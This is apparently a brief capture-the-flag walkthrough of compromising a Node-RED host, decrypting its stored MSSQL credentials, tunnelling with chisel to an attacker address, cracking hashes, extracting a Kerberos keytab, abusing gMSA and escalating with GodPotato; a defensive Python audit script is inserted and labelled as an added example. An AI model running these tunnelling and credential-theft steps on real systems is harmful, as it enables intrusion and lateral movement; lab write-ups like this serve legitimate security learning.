Enumerating Node-RED turned up creds for MSSQL; it contains some credential files.

We can find this in the files:

Now we need to decrypt this password:
https://blog.hugopoi.net/en/2021/12/28/how-to-decrypt-flows_cred-json-from-nodered-data/

Running it now:
./cred_decode.sh .
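The decode step works when the encryption key sits in the same directory as flows_cred.json, which is what Node-RED does when settings.js sets no credentialSecret. The following audit check is an added example, not code from this writeup or the linked blog; the key-file names and the `_credentialSecret` field are assumed Node-RED defaults, and `audit_userdir` is a hypothetical helper name.

```python
import json
import sys
from pathlib import Path

# Assumed Node-RED defaults: an auto-generated key is stored in one of these
# files as "_credentialSecret" when settings.js sets no credentialSecret.
KEY_FILES = (".config.runtime.json", ".config.json")


def load_json(path):
    """Parse a JSON file, returning None if it is missing or malformed."""
    try:
        return json.loads(path.read_text())
    except (OSError, ValueError):
        return None


def has_generated_key(path):
    """True if the file carries an auto-generated credential key."""
    data = load_json(path)
    return isinstance(data, dict) and "_credentialSecret" in data


def audit_userdir(userdir):
    """Return sorted (file name, finding) pairs for a Node-RED user directory."""
    userdir = Path(userdir)
    findings = set()
    key_files = [n for n in KEY_FILES if has_generated_key(userdir / n)]
    for cred in userdir.glob("*_cred.json"):
        data = load_json(cred)
        if not isinstance(data, dict):
            findings.add((cred.name, "unparseable"))
        elif "$" in data:
            # Encrypted blob: only as strong as the protection of its key.
            if key_files:
                findings.add((cred.name, "key-stored-alongside:" + key_files[0]))
        elif data:
            findings.add((cred.name, "plaintext-credentials"))
        # The file should be readable by the service account only.
        if cred.stat().st_mode & 0o077:
            findings.add((cred.name, "readable-by-group-or-other"))
    return sorted(findings)


if __name__ == "__main__":
    for name, finding in audit_userdir(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{name}: {finding}")
```

A "key-stored-alongside" finding means anyone who can read the directory can recover the stored passwords; setting credentialSecret in settings.js and keeping it out of the data directory removes that condition.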
Now checking access to MSSQL from this machine:

Now we can port forward with chisel.

Target:
./chisel client 10.8.1.208:8001 R:socks

Attacker:
chisel server --reverse --socks5 -p 8001
Now enumerating database DemoS

And using CrackStation we get the password

Now checking the Linux host for the realm, we can switch to a domain user and get the flag:
Now using KeyTabExtract on /etc/krb5.keytab
Using BloodHound:

We can get the gMSA password with
Now we can use this to impersonate users in the SQL)ADMINS group
There are 2 users in the group:
Not allowed
Now we can use GodPotato, as we have the SeImpersonate permission: